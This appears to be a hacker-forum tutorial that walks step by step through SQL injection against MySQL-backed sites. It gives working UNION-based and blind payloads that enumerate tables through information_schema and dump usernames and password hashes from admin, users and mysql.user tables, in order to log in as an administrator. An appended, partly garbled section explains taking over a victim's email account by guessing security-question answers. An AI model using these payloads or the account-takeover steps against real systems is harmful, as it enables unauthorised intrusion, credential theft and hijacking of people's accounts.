A SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website in order to dump the database content to the attacker. SQL injection is a code injection technique that exploits a security vulnerability in a website's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
Using well designed query language interpreters can prevent SQL injections. In the wild, it has been noted that applications experience, on average, 71 attempts an hour. When under direct attack, some applications occasionally came under aggressive attacks and at their peak, were attacked 800-1300 times per hour.



1.SQL Injection (classic or error based or whatever you call it) big_smile

2.Blind SQL Injection (the harder part)


So let's start with some action big_smile


1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection smile

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/*
http://www.site.com/news.php?id=5 order by 2/*
http://www.site.com/news.php?id=5 order by 3/*
http://www.site.com/news.php?id=5 order by 4/*

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works smile

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --

it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it smile

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version big_smile

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good big_smile)

we know that table admin exists...

now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up smile

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice smile

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed usernameassword on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser big_smile

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... big_smile

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... big_smile

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together big_smile

for that we use concat() , i decribe it earlier.

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is userass:email from table users.

example: admin:hash:whatever@blabla.com


That's all in this part, now we can proceed on harder part smile


2. Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done big_smile

I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it big_smile

Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend smile

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one smile

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)


4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR big_smile


Hope you learned something from this paper.


Have FUN! (:


Credits :
Cat- Devilcode

Hacking using the "Forgot Your Password"

This is the easiest to use by a normal hacker do his account of a trespass. Here all information and data collected will be dedicated to the process of returning the victim to guess the password security question (Secret Question) are usually not taken seriously by some individuals. Hackers enter all the data necessary to restore the password to the words and things that are easily available on the nature and behavior tingah victim either in terms of personality, hobbies and so on. Armed with the information obtained, the security question is often asked, such as date of birth, postcode and place of residence can be answered easily and thus can change the password of the victim. Although sometimes hackers can not answer the question correctly, they will try the next day because there are systems such as the Yahoo allows the user to enter 10 times after a failed attempt and making the system will block your account for 24 hours. So hackers will try to find the all the information that enables them to intrude into your personal account.

The Steps :

1. Find victim email :

2. Try "Forgot my Password"

3. Try Answer the Security Question :)
4. After you got the Email, Try reset the victim account .

Read More